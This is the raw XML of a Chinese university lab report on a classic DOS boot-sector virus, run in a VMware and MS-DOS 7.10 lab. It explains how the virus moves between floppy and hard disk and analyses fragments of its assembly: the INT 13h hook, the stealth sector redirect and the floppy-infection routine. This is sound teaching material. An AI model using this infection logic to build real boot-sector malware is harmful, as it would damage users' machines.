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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>引导型病毒实验报告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asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
                <w:bCs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bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>组员名单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asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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1.【实验目的】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="210" w:firstLineChars="10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通过实验，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了解引导区病毒的感染对象和感染特征，重点学习引导性病毒的感染机制和恢复感染病毒文件的方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="210" w:firstLineChars="100"/>
        <w:rPr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2.【实验内容】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:left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本实验需要完成的内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="2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引导阶段病毒由软盘感染硬盘实验。通过触发病毒，观察病毒发作的现象和步骤学习病毒的感染机制；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="2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DOS运行时病毒由硬盘感染软盘的实现。通过触发病毒，观察病毒发作的现象和步骤学习病毒的感染机制；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="20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3.【实验环境】</w:t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VMWare 16.2.1</w:t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MS-Dos 7.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/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4.【实验素材】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420" w:firstLineChars="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virus.img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(是含有病毒的虚拟软盘)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="42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empty.img</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（是空白盘）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia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5.【实验步骤】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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第一步 环境安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left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  <w:t xml:space="preserve">(1)安装VMWare,MS-Dos 7.10 </w:t>
      </w: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（非重点，省略，自行百度）</w:t>
      </w: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第2步 实验过程</w:t>
      </w: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①软盘感染硬盘：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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确保初始环境正常，首先正常启动虚拟机查看是否已被病毒感染。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376295" cy="168275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确认初始环境正常，关闭虚拟机，引入病毒软盘：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3509645" cy="156337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正常启动，发现已被感染：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018280" cy="1372870"/>
            <wp:effectExtent l="0" t="0" r="127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输入任意键：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6545" cy="1674495"/>
            <wp:effectExtent l="0" t="0" r="825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②验证硬盘已经被感染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（1）关闭虚拟机，将 病毒软盘（即virus.img）卸下（图5-1-2-1），再将虚拟机启动，发现硬盘已被感染（图5-1-2-2）：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672965" cy="2108835"/>
            <wp:effectExtent l="0" t="0" r="133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图1-2-1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tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4304665" cy="24860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</w:t>
      </w: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5-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1-2-2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按任意键后发现系统正常启动：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9995" cy="2470785"/>
            <wp:effectExtent l="0" t="0" r="1905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说明去掉病毒软盘的条件下，依旧发现存在病毒感染的情况，证明了硬盘已被感染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③硬盘感染软盘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（1）插入empty.img,启动计算机，如图 5-1-3-1, 5-1-3-2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81245" cy="163385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5-1-3-1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9880" cy="2103120"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1143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5-1-3-2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取出软盘，设置为硬盘启动（图 5-1-3-3），通过命令format A:/q快速格式化软盘。（图 5-1-3-4）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3181350" cy="2393315"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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图 5-1-3-3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2219325"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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图 5-1-3-4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(3)设置为软驱启动(图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5-1-3-5),启动后的效果(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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5-1-3-6)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945" cy="1989455"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1079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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5-1-3-5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4945" cy="1713230"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12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80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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5-1-3-6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.【实验原理】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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（1）正常的引导过程：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MBR和分区表装载DOS引导区,接着系统运行DOS引导程序，然后加载IO.sys,MSDOS.sys ,于是DOS系统成功加载。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（2）引导型病毒感染磁盘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引导型病毒从软盘加载到内存，寻找DOS引导区的位置，将DOS引导区移动到别的位置，病毒将自己写入原DOS引导区的位置。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（3）病毒在启动时获得控制权：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="40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MBR和分区表将病毒的引导程序加载入内存，运行病毒引导程序，病毒驻留内存，原DOS引导程序执行并加载DOS系统。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病毒感染机制：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软盘感染硬盘：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，会读取引导扇区AA55H，因为AA55H存在，系统认为正常，于是控制权交给C盘，可此时的引导扇区已被病毒替换所以会执行病毒的恶意代码（但因为不是启动盘，只有病毒代码，所以病毒执行完后就会停止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验证硬盘被感染：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开机自检完成后，硬盘的引导扇区（实际上是病毒代码）加载进内存执行。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真正的引导代码还在，只是被病毒移到别的地方，所以按回车系统还是能正常启动。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硬盘感染软盘：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启动起来，病毒正常运行，此时格式化A盘（会把软盘引导扇区写上病毒，病毒已进入内存）将会成功感染软盘。关机并修改启动顺序为软盘第一，硬盘第二。开机后病毒正常运行。按任意键无法进入系统，因为软盘除了引导区都为空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b/>
        </w:rPr>
        <w:t>7.【源码分析】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs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（1）代码总体结构图（图 7-1）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="20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4785360" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="15240" b="952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 w:leftChars="20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图 7-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/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（2）表现模块：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:left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效果：黑色屏幕上一个笑脸从左到右快速移动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312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312"/>
        </w:tabs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mainloop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nextloop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63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jnz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doshow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doshow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dispstr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调用显示字符串例程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调用10h中断将字符串打印到屏幕上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waitstart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loop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waitstart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clearstr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用空格清除上一次的输入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0100h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16h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读取键盘缓冲区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jz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nextloop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调用10h中断将字符串打印到屏幕上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dispstr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es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bootmessage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es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C586C0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串地址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C586C0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串长度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01301h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C586C0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C586C0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01h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000ch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页号为0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C586C0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黑底红字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C586C0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0ch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高亮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10h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10h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号中断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用空格清除上一次的输入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clearstr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es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clearmessage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01301h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000ch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10h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</w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:leftChars="200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恶意代码核心部分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先读取软盘0面0道1扇区到病毒常驻段偏移地址为0200h,读取成功则转read_succ处理，读取失败则软驱复位。读取操作次数减1，不为0再次读取，否则退出。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读取成功后以vir_init开头处的机器码进行比较，如果相等则说明已经感染了无需再次感染直接退出，不相等则进行感染。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vint13h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0001h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是否对0道1扇区进行操作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jz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stealth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是则进入特殊处理程序stealth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是否操作a驱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jnz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vint13h_ext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不是则转到原始int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13h中断执行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01h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是否操作奇数个扇区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测试al的最低位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jnz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vint13h_ext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不是则转到原始int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13h中断执行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inf_fd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调用传染软盘子程序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vint13h_ext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病毒int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13h到此结束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popf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下面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dword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oint13_ip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调用原始int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13h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开始正常处理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stealth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特殊处理部分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01h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是否操作一个扇区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jnz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vint13h_ext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不是则转到正常中断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0080h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是否操作硬盘0面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jnz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vint13h_ext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不是则转到正常中断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inc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对硬盘0面0道1扇区操作改为对2扇区的操作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vint13h_ext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转到正常的中断服务程序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inf_fd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传染软盘子程序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si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置ds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es的值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di置0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0003h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si置3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表示读3次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read_again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0201h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0200h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0001h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读取软盘0面0道1扇区到病毒常驻段偏移地址为0200h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dword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oint13_ip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jnb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read_succ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读取成功转read_succ处理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否则软驱复位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dword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oint13_ip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dec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次数减1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jnz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read_again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不为0再次读取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jmp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inf_ext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否则退出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read_succ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读取成功后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以vir_init处一个字的机器码为特征码进行比较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判断软盘是否已经染毒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如果染毒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则进行传染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magic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jz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inf_ext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已染毒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退出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4f0fh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reg_cx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存放正常的引导程序磁道号扇区号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0301h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01h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写入软盘1面79道15扇区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dword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oint13_ip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jb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inf_ext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下面将驻留在内存中的病毒程序写入软盘的0面0道1扇区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0301h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mov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0001h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xor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pushf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dword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oint13_ip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inf_ext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>:;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退出传染子程序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si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312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.【实验总结】</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20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AEAAE1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D4AEAA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F63ED0B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2F63ED0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290AF1D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6290AF1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C5"/>
    <w:rsid w:val="00033416"/>
    <w:rsid w:val="000A679D"/>
    <w:rsid w:val="00132CE9"/>
    <w:rsid w:val="00150FCF"/>
    <w:rsid w:val="0015299F"/>
    <w:rsid w:val="00153A24"/>
    <w:rsid w:val="001E68A9"/>
    <w:rsid w:val="001F316B"/>
    <w:rsid w:val="00234E78"/>
    <w:rsid w:val="0023521F"/>
    <w:rsid w:val="00252763"/>
    <w:rsid w:val="00283AC8"/>
    <w:rsid w:val="002918BE"/>
    <w:rsid w:val="002C70A5"/>
    <w:rsid w:val="00304F8E"/>
    <w:rsid w:val="003058AE"/>
    <w:rsid w:val="00350C7B"/>
    <w:rsid w:val="003C1AD8"/>
    <w:rsid w:val="00432948"/>
    <w:rsid w:val="004B6070"/>
    <w:rsid w:val="004C6665"/>
    <w:rsid w:val="004D07C5"/>
    <w:rsid w:val="004E57C5"/>
    <w:rsid w:val="005533E0"/>
    <w:rsid w:val="005A5051"/>
    <w:rsid w:val="005B01DE"/>
    <w:rsid w:val="0063778E"/>
    <w:rsid w:val="0065092D"/>
    <w:rsid w:val="00672FC7"/>
    <w:rsid w:val="00744952"/>
    <w:rsid w:val="007662B4"/>
    <w:rsid w:val="00904C2E"/>
    <w:rsid w:val="00985419"/>
    <w:rsid w:val="00A71DDD"/>
    <w:rsid w:val="00AD019D"/>
    <w:rsid w:val="00B36EA5"/>
    <w:rsid w:val="00B6397C"/>
    <w:rsid w:val="00B738A7"/>
    <w:rsid w:val="00BC683B"/>
    <w:rsid w:val="00BC7213"/>
    <w:rsid w:val="00BD2E15"/>
    <w:rsid w:val="00BE1ED2"/>
    <w:rsid w:val="00C54423"/>
    <w:rsid w:val="00CB488E"/>
    <w:rsid w:val="00D51531"/>
    <w:rsid w:val="00D719A0"/>
    <w:rsid w:val="00DD0877"/>
    <w:rsid w:val="00E337F6"/>
    <w:rsid w:val="00E96D7D"/>
    <w:rsid w:val="00EC1816"/>
    <w:rsid w:val="00ED28D0"/>
    <w:rsid w:val="00FD64C5"/>
    <w:rsid w:val="01551395"/>
    <w:rsid w:val="021F55F6"/>
    <w:rsid w:val="03552601"/>
    <w:rsid w:val="04A56162"/>
    <w:rsid w:val="06DB3014"/>
    <w:rsid w:val="07AE2045"/>
    <w:rsid w:val="085D72E2"/>
    <w:rsid w:val="08F037B7"/>
    <w:rsid w:val="090C7F1D"/>
    <w:rsid w:val="091A2FFB"/>
    <w:rsid w:val="09845A93"/>
    <w:rsid w:val="099113E8"/>
    <w:rsid w:val="09D61AB4"/>
    <w:rsid w:val="0A2A38DB"/>
    <w:rsid w:val="0B410994"/>
    <w:rsid w:val="0C941C4E"/>
    <w:rsid w:val="0DBD0EE4"/>
    <w:rsid w:val="0F271115"/>
    <w:rsid w:val="0FC008D9"/>
    <w:rsid w:val="0FD83DE3"/>
    <w:rsid w:val="100F1E58"/>
    <w:rsid w:val="10987607"/>
    <w:rsid w:val="10BF65FC"/>
    <w:rsid w:val="1198021F"/>
    <w:rsid w:val="122E7020"/>
    <w:rsid w:val="12B07A1B"/>
    <w:rsid w:val="130B54A6"/>
    <w:rsid w:val="13FD1E30"/>
    <w:rsid w:val="153C327C"/>
    <w:rsid w:val="15BD24EF"/>
    <w:rsid w:val="16B741E7"/>
    <w:rsid w:val="171072A6"/>
    <w:rsid w:val="1A9E5940"/>
    <w:rsid w:val="1BD379B0"/>
    <w:rsid w:val="1D777F85"/>
    <w:rsid w:val="1EF7515B"/>
    <w:rsid w:val="20DA1145"/>
    <w:rsid w:val="21651C20"/>
    <w:rsid w:val="21D535D4"/>
    <w:rsid w:val="23E06F78"/>
    <w:rsid w:val="25806408"/>
    <w:rsid w:val="25DB7C83"/>
    <w:rsid w:val="25E15EDC"/>
    <w:rsid w:val="25F860DB"/>
    <w:rsid w:val="272876DE"/>
    <w:rsid w:val="28D26B4A"/>
    <w:rsid w:val="2A0A25AC"/>
    <w:rsid w:val="2A816610"/>
    <w:rsid w:val="2C324A53"/>
    <w:rsid w:val="2E626C07"/>
    <w:rsid w:val="2E6F0022"/>
    <w:rsid w:val="2F377368"/>
    <w:rsid w:val="300F612A"/>
    <w:rsid w:val="318A7403"/>
    <w:rsid w:val="31A33B7E"/>
    <w:rsid w:val="331A591A"/>
    <w:rsid w:val="33BB54EB"/>
    <w:rsid w:val="33C64281"/>
    <w:rsid w:val="35335CA7"/>
    <w:rsid w:val="35B46683"/>
    <w:rsid w:val="36484AF7"/>
    <w:rsid w:val="3793757A"/>
    <w:rsid w:val="37BA6CFC"/>
    <w:rsid w:val="3959307F"/>
    <w:rsid w:val="398C34AC"/>
    <w:rsid w:val="3AEC3E9A"/>
    <w:rsid w:val="3AF02D9F"/>
    <w:rsid w:val="3BD36692"/>
    <w:rsid w:val="3D0D7987"/>
    <w:rsid w:val="3DFF0BAA"/>
    <w:rsid w:val="3E9A1AB1"/>
    <w:rsid w:val="3ED36514"/>
    <w:rsid w:val="41082624"/>
    <w:rsid w:val="41833C3C"/>
    <w:rsid w:val="420258B9"/>
    <w:rsid w:val="42D8788A"/>
    <w:rsid w:val="42E0084A"/>
    <w:rsid w:val="43104057"/>
    <w:rsid w:val="455B28A1"/>
    <w:rsid w:val="45E63AEC"/>
    <w:rsid w:val="47770072"/>
    <w:rsid w:val="47BE672D"/>
    <w:rsid w:val="4A252EDA"/>
    <w:rsid w:val="4AD56FB2"/>
    <w:rsid w:val="4AD979C2"/>
    <w:rsid w:val="4B151F68"/>
    <w:rsid w:val="4C1437AE"/>
    <w:rsid w:val="4CAE4A6E"/>
    <w:rsid w:val="4CE84BC2"/>
    <w:rsid w:val="4D11602A"/>
    <w:rsid w:val="4E35579B"/>
    <w:rsid w:val="4EA75CC5"/>
    <w:rsid w:val="4FD94C8F"/>
    <w:rsid w:val="51962ECC"/>
    <w:rsid w:val="51AE54A6"/>
    <w:rsid w:val="51D306A3"/>
    <w:rsid w:val="51EA5730"/>
    <w:rsid w:val="522D7A83"/>
    <w:rsid w:val="5381393B"/>
    <w:rsid w:val="55373E5D"/>
    <w:rsid w:val="56BE2AC1"/>
    <w:rsid w:val="58587ABB"/>
    <w:rsid w:val="598A5B33"/>
    <w:rsid w:val="5A422B5E"/>
    <w:rsid w:val="5A470D1A"/>
    <w:rsid w:val="5A5042EC"/>
    <w:rsid w:val="5CF31D30"/>
    <w:rsid w:val="5DB361BB"/>
    <w:rsid w:val="5E9754EA"/>
    <w:rsid w:val="5F292C6A"/>
    <w:rsid w:val="5FDC6ECE"/>
    <w:rsid w:val="601E3AF4"/>
    <w:rsid w:val="6151629C"/>
    <w:rsid w:val="61E43D57"/>
    <w:rsid w:val="62732A66"/>
    <w:rsid w:val="62BC7AE6"/>
    <w:rsid w:val="62E033E0"/>
    <w:rsid w:val="655518D4"/>
    <w:rsid w:val="65BF46FE"/>
    <w:rsid w:val="666C4F90"/>
    <w:rsid w:val="66960935"/>
    <w:rsid w:val="6824386B"/>
    <w:rsid w:val="68BE32F3"/>
    <w:rsid w:val="69EB425B"/>
    <w:rsid w:val="6A7362EA"/>
    <w:rsid w:val="6B114927"/>
    <w:rsid w:val="6E6B66ED"/>
    <w:rsid w:val="6E864723"/>
    <w:rsid w:val="6E9B21D6"/>
    <w:rsid w:val="6F2F08C9"/>
    <w:rsid w:val="6F6434F3"/>
    <w:rsid w:val="713719A4"/>
    <w:rsid w:val="72360F31"/>
    <w:rsid w:val="724E2520"/>
    <w:rsid w:val="730F4958"/>
    <w:rsid w:val="750477C2"/>
    <w:rsid w:val="7594043D"/>
    <w:rsid w:val="76180194"/>
    <w:rsid w:val="76217B43"/>
    <w:rsid w:val="782D6C39"/>
    <w:rsid w:val="785053AF"/>
    <w:rsid w:val="78DB6F47"/>
    <w:rsid w:val="79AE69F5"/>
    <w:rsid w:val="7A684068"/>
    <w:rsid w:val="7AFE6872"/>
    <w:rsid w:val="7B62421F"/>
    <w:rsid w:val="7C2C5CED"/>
    <w:rsid w:val="7FC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眉 字符"/>
    <w:basedOn w:val="6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225</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>263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2019-09-20T05:50:00Z</dcterms:created>
  <dc:creator>Windows 用户</dc:creator>
  <cp:lastModifiedBy>Jarvis</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-04T12:26:46Z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